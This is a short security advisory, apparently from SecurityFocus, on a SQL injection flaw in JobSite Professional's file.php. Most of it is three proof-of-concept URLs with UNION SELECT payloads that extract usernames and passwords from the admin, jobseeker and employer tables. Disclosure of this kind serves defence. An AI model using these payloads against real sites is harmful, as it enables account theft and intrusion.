JobSite Professional File.PHP SQL injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_admin_users/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_jobseekers/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_employers/*


 

Privacy Statement
Copyright 2010, SecurityFocus